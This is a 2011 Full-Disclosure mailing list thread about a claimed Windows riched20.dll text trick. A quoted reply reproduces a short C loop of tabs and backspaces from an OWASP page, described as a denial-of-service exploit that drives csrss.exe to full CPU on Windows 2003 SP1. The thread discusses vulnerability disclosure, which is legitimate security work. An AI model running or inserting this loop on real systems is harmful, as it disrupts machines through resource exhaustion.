This is NOT coded.. the PoC i am explaining, is possible with simply copyying text,then using a sequence of keys, to make the actual sentence/s, appear. This code is not what shows up when it is dissected. It shows up with many x41 all over the email when it is done properly . Regards.
On 12 June 2011 11:29, Christian Sciberras <[email protected]> wrote: > For those lazy enough to search: > > > https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1 > > Excerpt: > > Basicaly just compile this and you will get a 100% processor usage by the > compiled exploit and Csrss.exe > > #include <stdio.h> > int main(void) > { > while(1) > printf("\t\t\b\b\b\b\b\b"); > return 0; > } > > > How this helps in sending spam is beyond me. > > > > On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <[email protected]>wrote: > >> On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =- <[email protected]> >> wrote: >> >> > It is now, over 1yr old atleast and exists in riched20.dll. >> > This PoC info is over for me also. >> Microsoft had problems with a backspace in the past. Search for "CSRSS >> Backspace Bug". >> >> > [SNIP >> >> Jeff >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
